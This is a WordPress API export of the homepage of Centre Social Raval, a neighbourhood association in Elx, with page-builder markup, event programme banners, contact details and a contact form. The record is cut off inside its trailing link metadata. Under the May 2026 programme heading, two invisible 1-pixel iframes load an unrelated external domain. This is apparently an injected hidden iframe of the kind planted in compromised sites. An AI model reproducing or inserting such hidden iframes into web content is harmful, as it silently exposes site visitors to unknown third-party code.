{"id":2244,"date":"2019-07-15T10:56:39","date_gmt":"2019-07-15T10:56:39","guid":{"rendered":"http:\/\/raval.es\/elx\/?page_id=2244"},"modified":"2026-04-30T20:36:17","modified_gmt":"2026-04-30T20:36:17","slug":"nova","status":"publish","type":"page","link":"https:\/\/raval.es\/elx\/","title":{"rendered":"ara"},"content":{"rendered":"<div id=\"fb-root\"><\/div>\n<p>[et_pb_section fb_built=\u00bb1&#8243; admin_label=\u00bbHero Section\u00bb _builder_version=\u00bb4.16&#8243; use_background_color_gradient=\u00bbon\u00bb background_color_gradient_direction=\u00bb90deg\u00bb background_color_gradient_stops=\u00bbrgba(244,240,233,0.9) 30%|rgba(244,240,233,0) 100%\u00bb background_color_gradient_overlays_image=\u00bbon\u00bb background_color_gradient_start=\u00bbrgba(244,240,233,0.9)\u00bb background_color_gradient_start_position=\u00bb30%\u00bb background_color_gradient_end=\u00bbrgba(244,240,233,0)\u00bb background_image=\u00bbhttp:\/\/raval.es\/elx\/wp-content\/uploads\/2017\/02\/barri.jpg\u00bb custom_margin=\u00bb|||\u00bb custom_padding=\u00bb5px|0px|5px|0px\u00bb global_colors_info=\u00bb{}\u00bb][et_pb_row custom_padding_last_edited=\u00bboff|desktop\u00bb admin_label=\u00bbHero Area\u00bb _builder_version=\u00bb4.16&#8243; background_size=\u00bbinitial\u00bb background_position=\u00bbtop_left\u00bb background_repeat=\u00bbrepeat\u00bb custom_padding=\u00bb27px|0px|0px|0px\u00bb global_colors_info=\u00bb{}\u00bb][et_pb_column type=\u00bb4_4&#8243; _builder_version=\u00bb4.16&#8243; custom_padding=\u00bb|||\u00bb global_colors_info=\u00bb{}\u00bb custom_padding__hover=\u00bb|||\u00bb][et_pb_text admin_label=\u00bbHero Title\u00bb _builder_version=\u00bb4.16&#8243; text_font=\u00bbPlayfair Display||||||||\u00bb header_font=\u00bbAlice||||||||\u00bb header_font_size=\u00bb80px\u00bb header_letter_spacing=\u00bb-3px\u00bb header_line_height=\u00bb1.1em\u00bb custom_margin=\u00bb||0px|\u00bb custom_padding=\u00bb|||\u00bb animation_style=\u00bbslide\u00bb animation_direction=\u00bbleft\u00bb animation_intensity_slide=\u00bb5%\u00bb animation_starting_opacity=\u00bb100%\u00bb text_font_size_last_edited=\u00bboff|desktop\u00bb header_font_size_tablet=\u00bb\u00bb header_font_size_phone=\u00bb60px\u00bb header_font_size_last_edited=\u00bbon|phone\u00bb inline_fonts=\u00bbLobster\u00bb global_colors_info=\u00bb{}\u00bb]<\/p>\n<h1><span style=\"font-family: Lobster; font-weight: normal; color: #8e3013;\">fem barri<\/span><\/h1>\n<p>[\/et_pb_text][et_pb_text _builder_version=\u00bb4.16&#8243; text_font_size=\u00bb18px\u00bb text_line_height=\u00bb1.8em\u00bb max_width=\u00bb500px\u00bb custom_margin=\u00bb|||\u00bb custom_padding=\u00bb||10px|\u00bb animation_style=\u00bbslide\u00bb animation_direction=\u00bbleft\u00bb animation_intensity_slide=\u00bb5%\u00bb animation_starting_opacity=\u00bb100%\u00bb inline_fonts=\u00bbAmaranth\u00bb global_colors_info=\u00bb{}\u00bb]<\/p>\n<p><span style=\"font-family: Amaranth; font-weight: normal; font-size: xx-large;\">Raval, un poble dins d&#8217;un poble<\/span><\/p>\n<p>[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section][et_pb_section fb_built=\u00bb1&#8243; _builder_version=\u00bb4.16&#8243; module_alignment=\u00bbcenter\u00bb min_height=\u00bb60px\u00bb height=\u00bb80px\u00bb custom_margin=\u00bb||||false|false\u00bb custom_padding=\u00bb||||false|false\u00bb global_colors_info=\u00bb{}\u00bb][et_pb_row _builder_version=\u00bb4.16&#8243; width=\u00bb90%\u00bb max_width=\u00bb100%\u00bb module_alignment=\u00bbcenter\u00bb custom_margin=\u00bb-33px|0px|0px|0px|false|false\u00bb custom_padding=\u00bb0px|0px|0px|0px\u00bb use_custom_width=\u00bbon\u00bb width_unit=\u00bboff\u00bb custom_width_percent=\u00bb100%\u00bb global_colors_info=\u00bb{}\u00bb][et_pb_column type=\u00bb4_4&#8243; _builder_version=\u00bb4.16&#8243; custom_padding=\u00bb|||\u00bb global_colors_info=\u00bb{}\u00bb custom_padding__hover=\u00bb|||\u00bb][et_pb_text _builder_version=\u00bb4.27.2&#8243; _module_preset=\u00bbdefault\u00bb global_colors_info=\u00bb{}\u00bb]<\/p>\n<p style=\"text-align: justify;\"><a href=\"https:\/\/raval.es\/elx\/asociate\/\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/raval.es\/elx\/wp-content\/uploads\/2022\/01\/asociat.gif\" alt=\"\" class=\"wp-image-5282 alignnone size-medium\" width=\"300\" height=\"60\" \/><\/a> <a href=\"http:\/\/raval.es\/2026\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/raval.es\/elx\/wp-content\/uploads\/2022\/01\/inscripcions.gif\" alt=\"\" class=\"wp-image-5294 alignnone size-medium\" width=\"300\" height=\"60\" \/><\/a><a href=\"https:\/\/raval.es\/elx\/planol-raval\/\"> <img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/raval.es\/elx\/wp-content\/uploads\/2022\/01\/mapabarriraval.gif\" alt=\"\" class=\"wp-image-5298 alignnone size-full\" width=\"180\" height=\"60\" \/><\/a> <a href=\"https:\/\/raval.es\/dox\"> <img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/raval.es\/elx\/wp-content\/uploads\/2023\/09\/dox1.jpg\" width=\"180\" height=\"60\" alt=\"\" class=\"wp-image-6715 alignnone size-medium\" \/><\/a><a href=\"https:\/\/raval.es\/historia\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/raval.es\/elx\/wp-content\/uploads\/2024\/06\/historicban-300x100.jpg\" width=\"180\" height=\"60\" alt=\"\" class=\"wp-image-7658 alignnone size-medium\" srcset=\"https:\/\/raval.es\/elx\/wp-content\/uploads\/2024\/06\/historicban-300x100.jpg 300w, https:\/\/raval.es\/elx\/wp-content\/uploads\/2024\/06\/historicban-63x21.jpg 63w, https:\/\/raval.es\/elx\/wp-content\/uploads\/2024\/06\/historicban-36x12.jpg 36w, https:\/\/raval.es\/elx\/wp-content\/uploads\/2024\/06\/historicban-48x16.jpg 48w, https:\/\/raval.es\/elx\/wp-content\/uploads\/2024\/06\/historicban.jpg 360w\" sizes=\"auto, (max-width: 180px) 100vw, 180px\" \/><\/a><a href=\"https:\/\/raval.es\/elx\/telefons-dinteres\/\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/raval.es\/elx\/wp-content\/uploads\/2022\/01\/tele\u0300fons-dintere\u0301s.png\" alt=\"\" class=\"wp-image-5297 alignnone size-full\" width=\"180\" height=\"60\" srcset=\"https:\/\/raval.es\/elx\/wp-content\/uploads\/2022\/01\/tele\u0300fons-dintere\u0301s.png 300w, https:\/\/raval.es\/elx\/wp-content\/uploads\/2022\/01\/tele\u0300fons-dintere\u0301s-63x21.png 63w, https:\/\/raval.es\/elx\/wp-content\/uploads\/2022\/01\/tele\u0300fons-dintere\u0301s-36x12.png 36w, https:\/\/raval.es\/elx\/wp-content\/uploads\/2022\/01\/tele\u0300fons-dintere\u0301s-48x16.png 48w\" sizes=\"auto, (max-width: 180px) 100vw, 180px\" \/><\/a><a href=\"https:\/\/raval.es\/recursos\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/raval.es\/elx\/wp-content\/uploads\/2024\/06\/tt.jpg\" width=\"60\" height=\"60\" alt=\"\" class=\"wp-image-7664 alignnone size-full\" srcset=\"https:\/\/raval.es\/elx\/wp-content\/uploads\/2024\/06\/tt.jpg 300w, https:\/\/raval.es\/elx\/wp-content\/uploads\/2024\/06\/tt-150x150.jpg 150w, https:\/\/raval.es\/elx\/wp-content\/uploads\/2024\/06\/tt-21x21.jpg 21w, https:\/\/raval.es\/elx\/wp-content\/uploads\/2024\/06\/tt-36x36.jpg 36w, https:\/\/raval.es\/elx\/wp-content\/uploads\/2024\/06\/tt-48x48.jpg 48w\" sizes=\"auto, (max-width: 60px) 100vw, 60px\" \/><\/a><\/p>\n<p>[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section][et_pb_section fb_built=\u00bb1&#8243; admin_label=\u00bbBlog Section\u00bb _builder_version=\u00bb4.16&#8243; custom_padding=\u00bb0px||0px|\u00bb global_colors_info=\u00bb{}\u00bb][et_pb_row column_structure=\u00bb1_2,1_4,1_4&#8243; _builder_version=\u00bb4.16&#8243; width=\u00bb90%\u00bb max_width=\u00bb90%\u00bb min_height=\u00bb2559.2px\u00bb use_custom_width=\u00bbon\u00bb width_unit=\u00bboff\u00bb custom_width_percent=\u00bb90%\u00bb global_colors_info=\u00bb{}\u00bb][et_pb_column type=\u00bb1_2&#8243; _builder_version=\u00bb4.16&#8243; custom_padding=\u00bb0px||||false|false\u00bb global_colors_info=\u00bb{}\u00bb custom_padding__hover=\u00bb|||\u00bb][et_pb_blog include_categories=\u00bb81&#8243; show_author=\u00bboff\u00bb show_date=\u00bboff\u00bb show_categories=\u00bboff\u00bb show_pagination=\u00bboff\u00bb admin_label=\u00bbActual\u00bb _builder_version=\u00bb4.16&#8243; global_colors_info=\u00bb{}\u00bb][\/et_pb_blog][\/et_pb_column][et_pb_column type=\u00bb1_4&#8243; _builder_version=\u00bb4.16&#8243; custom_padding=\u00bb|||\u00bb global_colors_info=\u00bb{}\u00bb custom_padding__hover=\u00bb|||\u00bb][et_pb_text _builder_version=\u00bb4.27.2&#8243; text_font=\u00bbRighteous||||||||\u00bb background_color=\u00bb#d6d6d6&#8243; width=\u00bb100%\u00bb custom_margin=\u00bb||-1px||false|false\u00bb custom_padding=\u00bb7px||||false|false\u00bb global_colors_info=\u00bb{}\u00bb]<\/p>\n<h3 style=\"text-align: center;\"><span style=\"color: #e02b20;\">PROGRAMACI\u00d3<br \/>MAIG-26<\/span><\/h3>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<p>[\/et_pb_text][et_pb_image src=\u00bbhttps:\/\/raval.es\/elx\/wp-content\/uploads\/2026\/04\/AV-maig26.jpg\u00bb title_text=\u00bbAV-maig26&#8243; show_in_lightbox=\u00bbon\u00bb _builder_version=\u00bb4.27.2&#8243; _module_preset=\u00bbdefault\u00bb custom_margin=\u00bb||||false|false\u00bb global_colors_info=\u00bb{}\u00bb][\/et_pb_image][et_pb_text _builder_version=\u00bb4.27.2&#8243; text_font=\u00bbRighteous||||||||\u00bb background_color=\u00bb#d6d6d6&#8243; width=\u00bb100%\u00bb custom_margin=\u00bb||-1px||false|false\u00bb custom_padding=\u00bb7px||||false|false\u00bb global_colors_info=\u00bb{}\u00bb]<\/p>\n<h3 style=\"text-align: center;\"><span style=\"color: #e02b20;\">PROGRAMACI\u00d3<br \/>PERMANENT 2026<\/span><\/h3>\n<p>[\/et_pb_text][et_pb_image src=\u00bbhttps:\/\/raval.es\/elx\/wp-content\/uploads\/2026\/04\/RAVAL26-5.jpg\u00bb title_text=\u00bbRAVAL26-5&#8243; show_in_lightbox=\u00bbon\u00bb _builder_version=\u00bb4.27.2&#8243; _module_preset=\u00bbdefault\u00bb custom_margin=\u00bb||||false|false\u00bb hover_enabled=\u00bb0&#8243; global_colors_info=\u00bb{}\u00bb sticky_enabled=\u00bb0&#8243;][\/et_pb_image][et_pb_text _builder_version=\u00bb4.16&#8243; text_font=\u00bbRighteous||||||||\u00bb background_color=\u00bb#d6d6d6&#8243; width=\u00bb100%\u00bb custom_padding=\u00bb7px||0px||false|false\u00bb global_colors_info=\u00bb{}\u00bb]<\/p>\n<h3 style=\"text-align: center;\"><span style=\"color: #e02b20;\">ACTIVITATS<br \/> REALITZADES<br \/> <\/span><\/h3>\n<p>[\/et_pb_text][et_pb_blog fullwidth=\u00bboff\u00bb posts_number=\u00bb5&#8243; include_categories=\u00bb64&#8243; show_author=\u00bboff\u00bb show_date=\u00bboff\u00bb show_categories=\u00bboff\u00bb show_pagination=\u00bboff\u00bb masonry_tile_background_color=\u00bb#f7f7f7&#8243; admin_label=\u00bbarxiu\u00bb _builder_version=\u00bb4.16&#8243; header_font=\u00bb|700|||||||\u00bb body_font_size=\u00bb16px\u00bb body_line_height=\u00bb1.8em\u00bb meta_text_color=\u00bbrgba(0,0,0,0.23)\u00bb height_tablet=\u00bb\u00bb height_phone=\u00bb\u00bb height_last_edited=\u00bbon|desktop\u00bb custom_margin=\u00bb-34px|||-15px||\u00bb custom_padding=\u00bb0px|||||\u00bb border_width_all=\u00bb0px\u00bb global_colors_info=\u00bb{}\u00bb]<\/p>\n<p>[\/et_pb_blog][\/et_pb_column][et_pb_column type=\u00bb1_4&#8243; _builder_version=\u00bb4.16&#8243; custom_padding=\u00bb|||\u00bb global_colors_info=\u00bb{}\u00bb custom_padding__hover=\u00bb|||\u00bb][et_pb_text _builder_version=\u00bb4.18.0&#8243; text_font=\u00bbRighteous||||||||\u00bb background_color=\u00bb#d6d6d6&#8243; width=\u00bb100%\u00bb custom_margin=\u00bb||5px||false|false\u00bb custom_padding=\u00bb7px||||false|false\u00bb global_colors_info=\u00bb{}\u00bb]<\/p>\n<h3 style=\"text-align: center;\"><span style=\"color: #e02b20;\">NOTIS<br \/><\/span><\/h3>\n<p>[\/et_pb_text][et_pb_blog fullwidth=\u00bboff\u00bb posts_number=\u00bb6&#8243; include_categories=\u00bb51&#8243; show_author=\u00bboff\u00bb show_date=\u00bboff\u00bb show_categories=\u00bboff\u00bb show_pagination=\u00bboff\u00bb masonry_tile_background_color=\u00bb#f7f7f7&#8243; admin_label=\u00bbNoticies\u00bb _builder_version=\u00bb4.18.0&#8243; header_font=\u00bb|700|||||||\u00bb body_font_size=\u00bb12px\u00bb body_line_height=\u00bb1.8em\u00bb meta_text_color=\u00bbrgba(0,0,0,0.23)\u00bb max_width=\u00bb100%\u00bb custom_margin=\u00bb0px|-15px|-25px|0px|false|false\u00bb custom_padding=\u00bb0px||||false|false\u00bb border_width_all=\u00bb0px\u00bb global_colors_info=\u00bb{}\u00bb min_height__hover_enabled=\u00bbon|desktop\u00bb height__hover_enabled=\u00bbon|desktop\u00bb]<\/p>\n<p>[\/et_pb_blog][\/et_pb_column][\/et_pb_row][\/et_pb_section][et_pb_section fb_built=\u00bb1&#8243; fullwidth=\u00bbon\u00bb admin_label=\u00bbMap Section\u00bb _builder_version=\u00bb4.16&#8243; custom_padding=\u00bb0px|0px|0px|0px\u00bb global_colors_info=\u00bb{}\u00bb][et_pb_fullwidth_image src=\u00bbhttps:\/\/raval.es\/elx\/wp-content\/uploads\/2021\/08\/ravalmapeswww2021.png\u00bb title_text=\u00bbravalmapeswww2021&#8243; url=\u00bbhttps:\/\/raval.es\/elx\/planol-raval\/\u00bb _builder_version=\u00bb4.16&#8243; global_colors_info=\u00bb{}\u00bb]<\/h2>\n<p>&nbsp;<\/p>\n<h2>\n[\/et_pb_fullwidth_image][\/et_pb_section][et_pb_section fb_built=\u00bb1&#8243; admin_label=\u00bbFooter Section\u00bb _builder_version=\u00bb4.18.0&#8243; custom_margin=\u00bb||-15px|||\u00bb custom_padding=\u00bb20px||20px||false|false\u00bb global_colors_info=\u00bb{}\u00bb][et_pb_row column_structure=\u00bb1_3,2_3&#8243; admin_label=\u00bbFooter Area\u00bb _builder_version=\u00bb4.16&#8243; global_colors_info=\u00bb{}\u00bb][et_pb_column type=\u00bb1_3&#8243; _builder_version=\u00bb4.16&#8243; custom_padding=\u00bb|||\u00bb global_colors_info=\u00bb{}\u00bb custom_padding__hover=\u00bb|||\u00bb][et_pb_text admin_label=\u00bbTitle\u00bb _builder_version=\u00bb4.16&#8243; header_2_font=\u00bbAlice||||||||\u00bb header_2_font_size=\u00bb36px\u00bb animation_style=\u00bbfold\u00bb animation_direction=\u00bbleft\u00bb animation_intensity_fold=\u00bb20%\u00bb animation_starting_opacity=\u00bb100%\u00bb global_colors_info=\u00bb{}\u00bb]<\/p>\n<h2>Contacte<\/h2>\n<p>[\/et_pb_text][et_pb_blurb title=\u00bbAdre\u00e7a\u00bb admin_label=\u00bbAddress\u00bb _builder_version=\u00bb4.16&#8243; header_font=\u00bb|600|||||||\u00bb header_font_size=\u00bb16px\u00bb header_line_height=\u00bb1.8em\u00bb body_font_size=\u00bb16px\u00bb body_line_height=\u00bb1.8em\u00bb animation_style=\u00bbfold\u00bb animation_direction=\u00bbleft\u00bb animation_intensity_fold=\u00bb20%\u00bb animation_starting_opacity=\u00bb100%\u00bb global_colors_info=\u00bb{}\u00bb]<\/p>\n<p>Centre Social Raval<br \/>Boix i Rosario, 2<br \/>(Pla\u00e7a Major del Raval)<br \/>03203 Elx<\/p>\n<h2><\/h2>\n<p>[\/et_pb_blurb][et_pb_blurb title=\u00bbEmail\u00bb admin_label=\u00bbAddress\u00bb _builder_version=\u00bb4.16&#8243; header_font=\u00bb|600|||||||\u00bb header_font_size=\u00bb16px\u00bb header_line_height=\u00bb1.8em\u00bb body_font_size=\u00bb16px\u00bb body_line_height=\u00bb1.8em\u00bb animation_style=\u00bbfold\u00bb animation_direction=\u00bbleft\u00bb animation_intensity_fold=\u00bb20%\u00bb animation_starting_opacity=\u00bb100%\u00bb global_colors_info=\u00bb{}\u00bb]<\/h2>\n<p>info@raval.es<\/p>\n<h2>\n[\/et_pb_blurb][et_pb_blurb title=\u00bbPhone\u00bb admin_label=\u00bbAddress\u00bb _builder_version=\u00bb4.16&#8243; header_font=\u00bb|600|||||||\u00bb header_font_size=\u00bb16px\u00bb header_line_height=\u00bb1.8em\u00bb body_font_size=\u00bb16px\u00bb body_line_height=\u00bb1.8em\u00bb animation_style=\u00bbfold\u00bb animation_direction=\u00bbleft\u00bb animation_intensity_fold=\u00bb20%\u00bb animation_starting_opacity=\u00bb100%\u00bb global_colors_info=\u00bb{}\u00bb]<\/h2>\n<h4><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2280\" src=\"http:\/\/raval.es\/elx\/wp-content\/uploads\/2018\/07\/Mobile-Smartphone-icon-300x300.png\" alt=\"\" width=\"50\" height=\"50\" srcset=\"https:\/\/raval.es\/elx\/wp-content\/uploads\/2018\/07\/Mobile-Smartphone-icon-300x300.png 300w, https:\/\/raval.es\/elx\/wp-content\/uploads\/2018\/07\/Mobile-Smartphone-icon-150x150.png 150w, https:\/\/raval.es\/elx\/wp-content\/uploads\/2018\/07\/Mobile-Smartphone-icon.png 512w\" sizes=\"auto, (max-width: 50px) 100vw, 50px\" \/><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2281\" src=\"http:\/\/raval.es\/elx\/wp-content\/uploads\/2018\/07\/WhatsApp-Logo-297x300.png\" alt=\"\" width=\"49\" height=\"50\" srcset=\"https:\/\/raval.es\/elx\/wp-content\/uploads\/2018\/07\/WhatsApp-Logo-297x300.png 297w, https:\/\/raval.es\/elx\/wp-content\/uploads\/2018\/07\/WhatsApp-Logo-150x150.png 150w, https:\/\/raval.es\/elx\/wp-content\/uploads\/2018\/07\/WhatsApp-Logo-768x777.png 768w, https:\/\/raval.es\/elx\/wp-content\/uploads\/2018\/07\/WhatsApp-Logo-1013x1024.png 1013w, https:\/\/raval.es\/elx\/wp-content\/uploads\/2018\/07\/WhatsApp-Logo-1080x1092.png 1080w, https:\/\/raval.es\/elx\/wp-content\/uploads\/2018\/07\/WhatsApp-Logo.png 1150w\" sizes=\"auto, (max-width: 49px) 100vw, 49px\" \/><strong>633 971 670<\/strong><\/h4>\n<h2>\n[\/et_pb_blurb][\/et_pb_column][et_pb_column type=\u00bb2_3&#8243; _builder_version=\u00bb4.16&#8243; custom_padding=\u00bb|||\u00bb global_colors_info=\u00bb{}\u00bb custom_padding__hover=\u00bb|||\u00bb][et_pb_contact_form email=\u00bbinfo@raval.es\u00bb title=\u00bbComunicate\u00bb success_message=\u00bbRecibido. Gracias por tu aportaci\u00f3n\u00bb submit_button_text=\u00bbEnviar\u00bb module_id=\u00bbet_pb_contact_form_0&#8243; _builder_version=\u00bb4.16&#8243; _unique_id=\u00bb272f4738-d4ef-48cc-a755-553ff5787564&#8243; form_field_background_color=\u00bbrgba(255,255,255,0)\u00bb title_font=\u00bbAlice||||||||\u00bb title_font_size=\u00bb36px\u00bb form_field_font_size=\u00bb16px\u00bb custom_button=\u00bbon\u00bb button_text_size=\u00bb14px\u00bb button_text_color=\u00bb#2a2a2a\u00bb button_bg_color=\u00bb#e0c588&#8243; button_border_width=\u00bb12px\u00bb button_border_color=\u00bb#e0c588&#8243; button_border_radius=\u00bb30px\u00bb button_letter_spacing=\u00bb2px\u00bb button_font=\u00bb|700||on|||||\u00bb button_use_icon=\u00bboff\u00bb animation_style=\u00bbfade\u00bb border_width_all=\u00bb1px\u00bb border_color_all=\u00bbrgba(0,0,0,0.12)\u00bb form_background_color=\u00bbrgba(255,255,255,0)\u00bb global_colors_info=\u00bb{}\u00bb][et_pb_contact_field field_id=\u00bbName\u00bb field_title=\u00bbNom\u00bb _builder_version=\u00bb4.16&#8243; global_colors_info=\u00bb{}\u00bb button_text_size__hover_enabled=\u00bboff\u00bb button_one_text_size__hover_enabled=\u00bboff\u00bb button_two_text_size__hover_enabled=\u00bboff\u00bb button_text_color__hover_enabled=\u00bboff\u00bb button_one_text_color__hover_enabled=\u00bboff\u00bb button_two_text_color__hover_enabled=\u00bboff\u00bb button_border_width__hover_enabled=\u00bboff\u00bb button_one_border_width__hover_enabled=\u00bboff\u00bb button_two_border_width__hover_enabled=\u00bboff\u00bb button_border_color__hover_enabled=\u00bboff\u00bb button_one_border_color__hover_enabled=\u00bboff\u00bb button_two_border_color__hover_enabled=\u00bboff\u00bb button_border_radius__hover_enabled=\u00bboff\u00bb button_one_border_radius__hover_enabled=\u00bboff\u00bb button_two_border_radius__hover_enabled=\u00bboff\u00bb button_letter_spacing__hover_enabled=\u00bboff\u00bb button_one_letter_spacing__hover_enabled=\u00bboff\u00bb button_two_letter_spacing__hover_enabled=\u00bboff\u00bb button_bg_color__hover_enabled=\u00bboff\u00bb button_one_bg_color__hover_enabled=\u00bboff\u00bb button_two_bg_color__hover_enabled=\u00bboff\u00bb][\/et_pb_contact_field][et_pb_contact_field field_id=\u00bbWhatsapp\u00bb field_title=\u00bbWhatsapp\u00bb max_length=\u00bb12&#8243; required_mark=\u00bboff\u00bb conditional_logic=\u00bbon\u00bb conditional_logic_rules=\u00bb%91{%22field%22:%22name%22,%22condition%22:%22is%22,%22value%22:%22%22}%93&#8243; _builder_version=\u00bb4.16&#8243; global_colors_info=\u00bb{}\u00bb button_text_size__hover_enabled=\u00bboff\u00bb button_one_text_size__hover_enabled=\u00bboff\u00bb button_two_text_size__hover_enabled=\u00bboff\u00bb button_text_color__hover_enabled=\u00bboff\u00bb button_one_text_color__hover_enabled=\u00bboff\u00bb button_two_text_color__hover_enabled=\u00bboff\u00bb button_border_width__hover_enabled=\u00bboff\u00bb button_one_border_width__hover_enabled=\u00bboff\u00bb button_two_border_width__hover_enabled=\u00bboff\u00bb button_border_color__hover_enabled=\u00bboff\u00bb button_one_border_color__hover_enabled=\u00bboff\u00bb button_two_border_color__hover_enabled=\u00bboff\u00bb button_border_radius__hover_enabled=\u00bboff\u00bb button_one_border_radius__hover_enabled=\u00bboff\u00bb button_two_border_radius__hover_enabled=\u00bboff\u00bb button_letter_spacing__hover_enabled=\u00bboff\u00bb button_one_letter_spacing__hover_enabled=\u00bboff\u00bb button_two_letter_spacing__hover_enabled=\u00bboff\u00bb button_bg_color__hover_enabled=\u00bboff\u00bb button_one_bg_color__hover_enabled=\u00bboff\u00bb button_two_bg_color__hover_enabled=\u00bboff\u00bb][\/et_pb_contact_field][et_pb_contact_field field_id=\u00bbEmail\u00bb field_title=\u00bbEmail\u00bb field_type=\u00bbemail\u00bb _builder_version=\u00bb4.16&#8243; global_colors_info=\u00bb{}\u00bb button_text_size__hover_enabled=\u00bboff\u00bb button_one_text_size__hover_enabled=\u00bboff\u00bb button_two_text_size__hover_enabled=\u00bboff\u00bb button_text_color__hover_enabled=\u00bboff\u00bb button_one_text_color__hover_enabled=\u00bboff\u00bb button_two_text_color__hover_enabled=\u00bboff\u00bb button_border_width__hover_enabled=\u00bboff\u00bb button_one_border_width__hover_enabled=\u00bboff\u00bb button_two_border_width__hover_enabled=\u00bboff\u00bb button_border_color__hover_enabled=\u00bboff\u00bb button_one_border_color__hover_enabled=\u00bboff\u00bb button_two_border_color__hover_enabled=\u00bboff\u00bb button_border_radius__hover_enabled=\u00bboff\u00bb button_one_border_radius__hover_enabled=\u00bboff\u00bb button_two_border_radius__hover_enabled=\u00bboff\u00bb button_letter_spacing__hover_enabled=\u00bboff\u00bb button_one_letter_spacing__hover_enabled=\u00bboff\u00bb button_two_letter_spacing__hover_enabled=\u00bboff\u00bb button_bg_color__hover_enabled=\u00bboff\u00bb button_one_bg_color__hover_enabled=\u00bboff\u00bb button_two_bg_color__hover_enabled=\u00bboff\u00bb][\/et_pb_contact_field][et_pb_contact_field field_id=\u00bbMessage\u00bb field_title=\u00bbMisatge\u00bb field_type=\u00bbtext\u00bb fullwidth_field=\u00bbon\u00bb _builder_version=\u00bb4.16&#8243; global_colors_info=\u00bb{}\u00bb button_text_size__hover_enabled=\u00bboff\u00bb button_one_text_size__hover_enabled=\u00bboff\u00bb button_two_text_size__hover_enabled=\u00bboff\u00bb button_text_color__hover_enabled=\u00bboff\u00bb button_one_text_color__hover_enabled=\u00bboff\u00bb button_two_text_color__hover_enabled=\u00bboff\u00bb button_border_width__hover_enabled=\u00bboff\u00bb button_one_border_width__hover_enabled=\u00bboff\u00bb button_two_border_width__hover_enabled=\u00bboff\u00bb button_border_color__hover_enabled=\u00bboff\u00bb button_one_border_color__hover_enabled=\u00bboff\u00bb button_two_border_color__hover_enabled=\u00bboff\u00bb button_border_radius__hover_enabled=\u00bboff\u00bb button_one_border_radius__hover_enabled=\u00bboff\u00bb button_two_border_radius__hover_enabled=\u00bboff\u00bb button_letter_spacing__hover_enabled=\u00bboff\u00bb button_one_letter_spacing__hover_enabled=\u00bboff\u00bb button_two_letter_spacing__hover_enabled=\u00bboff\u00bb button_bg_color__hover_enabled=\u00bboff\u00bb button_one_bg_color__hover_enabled=\u00bboff\u00bb button_two_bg_color__hover_enabled=\u00bboff\u00bb][\/et_pb_contact_field][\/et_pb_contact_form][\/et_pb_column][\/et_pb_row][\/et_pb_section][et_pb_section fb_built=\u00bb1&#8243; _builder_version=\u00bb4.18.0&#8243; _module_preset=\u00bbdefault\u00bb custom_margin=\u00bb0px|0px|0px|0px|false|false\u00bb custom_padding=\u00bb0px|0px|0px|0px|false|false\u00bb global_colors_info=\u00bb{}\u00bb][et_pb_row _builder_version=\u00bb4.18.0&#8243; _module_preset=\u00bbdefault\u00bb width=\u00bb100%\u00bb max_width=\u00bb100%\u00bb min_height=\u00bb182.4px\u00bb global_colors_info=\u00bb{}\u00bb][et_pb_column type=\u00bb4_4&#8243; _builder_version=\u00bb4.16&#8243; _module_preset=\u00bbdefault\u00bb global_colors_info=\u00bb{}\u00bb][et_pb_text _builder_version=\u00bb4.27.2&#8243; _module_preset=\u00bbdefault\u00bb global_colors_info=\u00bb{}\u00bb]<\/p>\n<h4 style=\"text-align: center;\">AMB EL SUPORT DE<\/h4>\n<p style=\"text-align: center;\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/raval.es\/elx\/wp-content\/uploads\/2024\/06\/GVA-Totsaunaveu-300x96.png\" width=\"250\" height=\"96\" alt=\"\" class=\"wp-image-7635 alignnone size-medium\" \/>\u00a0\u00a0\u00a0 <img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/raval.es\/elx\/wp-content\/uploads\/2021\/11\/Diputacion-AREA-JUVENTUD-300x150.png\" alt=\"\" class=\"wp-image-5156 alignnone size-medium\" width=\"142\" height=\"71\" \/>\u00a0 <img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/raval.es\/elx\/wp-content\/uploads\/2024\/04\/LOGO-HOR-VAL-AZUL-e1712433751823-300x150.jpg\" width=\"220\" height=\"150\" alt=\"\" class=\"wp-image-7209 alignnone size-medium\" \/><\/p>\n<p>[\/et_pb_text][\/et_pb_column][\/et_pb_row][\/et_pb_section]<\/p>\n","protected":false},"excerpt":{"rendered":"<p>fem barri Raval, un poble dins d&#8217;un poble PROGRAMACI\u00d3MAIG-26 PROGRAMACI\u00d3PERMANENT 2026ACTIVITATS REALITZADES NOTIS &nbsp; Contacte Centre Social RavalBoix i Rosario, 2(Pla\u00e7a Major del Raval)03203 Elx info@raval.es 633 971 670 AMB EL SUPORT DE \u00a0\u00a0\u00a0 \u00a0<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_et_pb_use_builder":"on","_et_pb_old_content":"","_et_gb_content_width":"","_joinchat":[],"footnotes":""},"class_list":["post-2244","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/raval.es\/elx\/wp-json\/wp\/v2\/pages\/2244","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/raval.es\/elx\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/raval.es\/elx\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/raval.es\/elx\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/raval.es\/elx\/wp-json\/wp\/v2\/comments?post=2244"}],"version-history":[{"count":217,"href":"https:\/\/raval.es\/elx\/wp-json